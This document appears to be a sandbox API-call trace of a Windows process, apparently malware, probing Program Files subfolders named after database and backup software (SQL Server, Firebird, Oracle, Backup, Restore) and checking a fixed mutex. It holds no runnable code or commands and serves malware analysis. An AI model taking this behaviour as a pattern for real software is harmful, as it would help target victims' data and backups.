ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="V䱠@嵤W企@\x18깬V\x181")) returned 0xffffffff [0103.882] GetLastError () returned 0x2 [0103.883] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", cchLength=0x36 | out: lpsz="c:\\program files\\microsoft sql server compact 
edition\\") returned 0x36 [0103.883] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d2c0, cbMultiByte=21, lpWideCharStr=0x18e410, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server\\\x18\x15") returned 21 [0103.883] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=9, lpWideCharStr=0x18e458, cchWideChar=2047 | out: lpWideCharStr="Firebird\\ SQL Server\\rver\\tion\\") returned 9 [0103.883] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\Firebird", lpFindFileData=0x18f20c | out: lpFindFileData=0x18f20c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="V䱠@丬W企@\x18㢴X\x18;")) returned 0xffffffff [0103.883] GetLastError () returned 0x2 [0103.883] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", cchLength=0x36 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\") returned 0x36 [0103.883] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=9, lpWideCharStr=0x18e410, cchWideChar=2047 | out: lpWideCharStr="firebird\\") returned 9 [0103.884] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=8, lpWideCharStr=0x18e458, cchWideChar=2047 | out: lpWideCharStr="MSSQL.1\\\\ SQL Server\\rver\\tion\\") returned 8 [0103.884] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\MSSQL.1", lpFindFileData=0x18f20c | out: lpFindFileData=0x18f20c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, 
ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="V䱠@帜W企@\x18㤬X\x18D")) returned 0xffffffff [0103.884] GetLastError () returned 0x2 [0103.884] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", cchLength=0x36 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\") returned 0x36 [0103.884] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=8, lpWideCharStr=0x18e410, cchWideChar=2047 | out: lpWideCharStr="mssql.1\\ ") returned 8 [0103.884] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=37, lpWideCharStr=0x18e458, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server Compact Edition\\") returned 37 [0103.885] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\Microsoft SQL Server Compact Edition", lpFindFileData=0x18f20c | out: lpFindFileData=0x18f20c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="V䱠@嵤W企@\x18丬W\x18j")) returned 0xffffffff [0103.885] GetLastError () returned 0x2 [0103.885] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", cchLength=0x36 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\") returned 0x36 [0103.885] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac08, cbMultiByte=37, 
lpWideCharStr=0x18e410, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server compact edition\\icrosoft SQL Server Compact Edition\\") returned 37 [0103.885] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=6, lpWideCharStr=0x18e458, cchWideChar=2047 | out: lpWideCharStr="Adobe\\oft SQL Server Compact Edition\\") returned 6 [0103.886] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\Adobe", lpFindFileData=0x18f20c | out: lpFindFileData=0x18f20c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="V䱠@令W企@\x18㢴X\x18q")) returned 0xffffffff [0103.888] GetLastError () returned 0x2 [0103.888] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", cchLength=0x36 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\") returned 0x36 [0103.888] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=6, lpWideCharStr=0x18e410, cchWideChar=2047 | out: lpWideCharStr="adobe\\丨W`") returned 6 [0103.888] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=7, lpWideCharStr=0x18e458, cchWideChar=2047 | out: lpWideCharStr="Oracle\\ft SQL Server Compact Edition\\") returned 7 [0103.888] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\Oracle", lpFindFileData=0x18f20c | out: lpFindFileData=0x18f20c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, 
ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="V䱠@側W企@\x18㤬X\x18y")) returned 0xffffffff [0103.889] GetLastError () returned 0x2 [0103.889] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", cchLength=0x36 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\") returned 0x36 [0103.889] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=7, lpWideCharStr=0x18e410, cchWideChar=2047 | out: lpWideCharStr="oracle\\X ") returned 7 [0103.889] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=7, lpWideCharStr=0x18e458, cchWideChar=2047 | out: lpWideCharStr="Archiveft SQL Server Compact Edition\\") returned 7 [0103.889] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\Archive", lpFindFileData=0x18f20c | out: lpFindFileData=0x18f20c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="V䱠@嵤W企@\x18㢴X\x18\x81")) returned 0xffffffff [0103.889] GetLastError () returned 0x2 [0103.889] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", cchLength=0x36 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\") returned 0x36 [0103.890] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=7, lpWideCharStr=0x18e410, cchWideChar=2047 | out: lpWideCharStr="archiveX ") returned 7 [0103.890] MultiByteToWideChar (in: 
CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=6, lpWideCharStr=0x18e458, cchWideChar=2047 | out: lpWideCharStr="Backupeft SQL Server Compact Edition\\") returned 6 [0103.890] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\Backup", lpFindFileData=0x18f20c | out: lpFindFileData=0x18f20c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="V䱠@令W企@\x18㤬X\x18\x88")) returned 0xffffffff [0103.890] GetLastError () returned 0x2 [0103.890] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", cchLength=0x36 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\") returned 0x36 [0103.890] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=6, lpWideCharStr=0x18e410, cchWideChar=2047 | out: lpWideCharStr="backup㢰X ") returned 6 [0103.890] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=6, lpWideCharStr=0x18e458, cchWideChar=2047 | out: lpWideCharStr="Reserveft SQL Server Compact Edition\\") returned 6 [0103.891] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\Reserv", lpFindFileData=0x18f20c | out: lpFindFileData=0x18f20c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", 
cAlternateFileName="V䱠@側W企@\x18㢴X\x18\x8f")) returned 0xffffffff [0103.891] GetLastError () returned 0x2 [0103.891] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", cchLength=0x36 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\") returned 0x36 [0103.891] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=6, lpWideCharStr=0x18e410, cchWideChar=2047 | out: lpWideCharStr="reserv㤨X ") returned 6 [0103.891] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=7, lpWideCharStr=0x18e458, cchWideChar=2047 | out: lpWideCharStr="Restoreft SQL Server Compact Edition\\") returned 7 [0103.891] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\Restore", lpFindFileData=0x18f20c | out: lpFindFileData=0x18f20c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="V䱠@嵤W企@\x18㤬X\x18\x97")) returned 0xffffffff [0103.892] GetLastError () returned 0x2 [0103.892] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", cchLength=0x36 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\") returned 0x36 [0103.892] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=7, lpWideCharStr=0x18e410, cchWideChar=2047 | out: lpWideCharStr="restoreX ") returned 7 [0103.892] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", cchLength=0x36 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\") returned 0x36 [0103.892] SHGetMalloc (in: 
ppMalloc=0x18f458 | out: ppMalloc=0x18f458*=0x767666bc) returned 0x0 [0103.892] SHGetSpecialFolderLocation (in: hwnd=0x0, csidl=0, ppidl=0x18f454 | out: ppidl=0x18f454) returned 0x0 [0103.893] SHGetPathFromIDListW (in: pidl=0x578208, pszPath=0x57c6b4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0103.894] SysReAllocStringLen (in: pbstr=0x18f4dc*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", len=0x25 | out: pbstr=0x18f4dc*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0103.894] IMalloc:Free (This=0x767666bc, pv=0x578208) [0103.894] IUnknown:AddRef (This=0x767666bc) returned 0x1 [0103.894] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", cchLength=0x25 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop") returned 0x25 [0103.894] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.894] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.894] GlobalUnlock (hMem=0x45000c) returned 0 [0103.894] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.894] GlobalLock (hMem=0x450004) returned 0x58a010 [0103.894] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.894] GlobalUnlock (hMem=0x45000c) returned 0 [0103.894] GlobalHandle (pMem=0x58a010) returned 0x450004 [0103.894] GlobalUnlock (hMem=0x450004) returned 0 [0103.894] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\*.*", lpFindFileData=0x18f530 | out: lpFindFileData=0x18f530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x56ed00 [0103.895] FindNextFileW (in: hFindFile=0x56ed00, lpFindFileData=0x18f530 | out: lpFindFileData=0x18f530*(dwFileAttributes=0x10, 
ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0103.895] FindNextFileW (in: hFindFile=0x56ed00, lpFindFileData=0x18f530 | out: lpFindFileData=0x18f530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v3.5", cAlternateFileName="")) returned 1 [0103.895] FindNextFileW (in: hFindFile=0x56ed00, lpFindFileData=0x18f530 | out: lpFindFileData=0x18f530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v3.5", cAlternateFileName="")) returned 0 [0103.895] GetLastError () returned 0x12 [0103.895] FindClose (in: hFindFile=0x56ed00 | out: hFindFile=0x56ed00) returned 1 [0103.895] GlobalLock (hMem=0x450004) returned 0x588000 [0103.895] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.895] GlobalUnlock (hMem=0x450004) returned 0 [0103.895] GlobalLock (hMem=0x450004) returned 0x588000 [0103.895] GlobalLock (hMem=0x45000c) returned 0x58a010 [0103.895] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.895] GlobalUnlock (hMem=0x450004) returned 0 [0103.895] GlobalHandle (pMem=0x58a010) returned 0x45000c [0103.895] GlobalUnlock (hMem=0x45000c) 
returned 0 [0103.895] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\*.*", lpFindFileData=0x18f530 | out: lpFindFileData=0x18f530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x56ed00 [0103.896] FileTimeToLocalFileTime (in: lpFileTime=0x18f544, lpLocalFileTime=0x18f454 | out: lpLocalFileTime=0x18f454) returned 1 [0103.896] FileTimeToDosDateTime (in: lpFileTime=0x18f454, lpFatDate=0x18f512, lpFatTime=0x18f510 | out: lpFatDate=0x18f512, lpFatTime=0x18f510) returned 1 [0103.896] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.896] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.896] GlobalUnlock (hMem=0x45000c) returned 0 [0103.896] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.896] GlobalLock (hMem=0x450004) returned 0x58a010 [0103.896] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.896] GlobalUnlock (hMem=0x45000c) returned 0 [0103.896] GlobalHandle (pMem=0x58a010) returned 0x450004 [0103.896] GlobalUnlock (hMem=0x450004) returned 0 [0103.896] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0103.896] FindNextFileW (in: hFindFile=0x56ed00, lpFindFileData=0x18f530 | out: lpFindFileData=0x18f530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0103.896] 
FileTimeToLocalFileTime (in: lpFileTime=0x18f544, lpLocalFileTime=0x18f450 | out: lpLocalFileTime=0x18f450) returned 1 [0103.896] FileTimeToDosDateTime (in: lpFileTime=0x18f450, lpFatDate=0x18f512, lpFatTime=0x18f510 | out: lpFatDate=0x18f512, lpFatTime=0x18f510) returned 1 [0103.897] GlobalLock (hMem=0x450004) returned 0x588000 [0103.897] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.897] GlobalUnlock (hMem=0x450004) returned 0 [0103.897] GlobalLock (hMem=0x450004) returned 0x588000 [0103.897] GlobalLock (hMem=0x45000c) returned 0x58a010 [0103.897] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.897] GlobalUnlock (hMem=0x450004) returned 0 [0103.897] GlobalHandle (pMem=0x58a010) returned 0x45000c [0103.897] GlobalUnlock (hMem=0x45000c) returned 0 [0103.897] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0103.897] FindNextFileW (in: hFindFile=0x56ed00, lpFindFileData=0x18f530 | out: lpFindFileData=0x18f530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v3.5", cAlternateFileName="")) returned 1 [0103.897] FileTimeToLocalFileTime (in: lpFileTime=0x18f544, lpLocalFileTime=0x18f450 | out: lpLocalFileTime=0x18f450) returned 1 [0103.897] FileTimeToDosDateTime (in: lpFileTime=0x18f450, lpFatDate=0x18f512, lpFatTime=0x18f510 | out: lpFatDate=0x18f512, lpFatTime=0x18f510) returned 1 [0103.897] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.897] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.897] GlobalUnlock (hMem=0x45000c) returned 0 [0103.897] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.897] GlobalLock (hMem=0x450004) returned 0x58a010 [0103.897] GlobalHandle 
(pMem=0x588000) returned 0x45000c [0103.897] GlobalUnlock (hMem=0x45000c) returned 0 [0103.897] GlobalHandle (pMem=0x58a010) returned 0x450004 [0103.898] GlobalUnlock (hMem=0x450004) returned 0 [0103.898] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0103.898] GlobalLock (hMem=0x450004) returned 0x588000 [0103.898] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.898] GlobalUnlock (hMem=0x450004) returned 0 [0103.898] GlobalLock (hMem=0x450004) returned 0x588000 [0103.898] GlobalLock (hMem=0x45000c) returned 0x58a010 [0103.898] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.898] GlobalUnlock (hMem=0x450004) returned 0 [0103.898] GlobalHandle (pMem=0x58a010) returned 0x45000c [0103.898] GlobalUnlock (hMem=0x45000c) returned 0 [0103.898] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0103.898] SysReAllocStringLen (in: pbstr=0x18f450*=0x0, psz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5", len=0x3a | out: pbstr=0x18f450*="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5") returned 1 [0103.898] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.898] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.898] GlobalUnlock (hMem=0x45000c) returned 0 [0103.899] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.899] GlobalLock (hMem=0x450004) returned 0x58a010 [0103.899] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.899] GlobalUnlock (hMem=0x45000c) returned 0 [0103.899] GlobalHandle (pMem=0x58a010) returned 0x450004 [0103.899] GlobalUnlock (hMem=0x450004) returned 0 [0103.899] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Microsoft\\Exchange Server", lpFindFileData=0x18eecc | out: lpFindFileData=0x18eecc*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, 
ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="䱈@庎W幢W企@\x18㮴V\x18\x1b")) returned 0xffffffff [0104.045] GetLastError () returned 0x3 [0104.045] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", cchLength=0x3b | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\") returned 0x3b [0104.045] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d2c0, cbMultiByte=26, lpWideCharStr=0x18e0d0, cchWideChar=2047 | out: lpWideCharStr="microsoft\\exchange server\\\x1b") returned 26 [0104.045] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=21, lpWideCharStr=0x18e118, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server\\rver\\牡敩s") returned 21 [0104.046] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Microsoft SQL Server", lpFindFileData=0x18eecc | out: lpFindFileData=0x18eecc*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="嵤W䱠@巬W企@\x18㸼V\x181")) returned 0xffffffff [0104.048] GetLastError () returned 0x2 [0104.048] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", cchLength=0x3b | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\") returned 0x3b [0104.048] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d2c0, 
cbMultiByte=21, lpWideCharStr=0x18e0d0, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server\\\x18\x15") returned 21 [0104.048] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=9, lpWideCharStr=0x18e118, cchWideChar=2047 | out: lpWideCharStr="Firebird\\ SQL Server\\rver\\牡敩s") returned 9 [0104.048] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Firebird", lpFindFileData=0x18eecc | out: lpFindFileData=0x18eecc*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="嵤W䱠@庤W企@\x18㟄X\x18;")) returned 0xffffffff [0104.050] GetLastError () returned 0x2 [0104.050] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", cchLength=0x3b | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\") returned 0x3b [0104.050] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99d8, cbMultiByte=9, lpWideCharStr=0x18e0d0, cchWideChar=2047 | out: 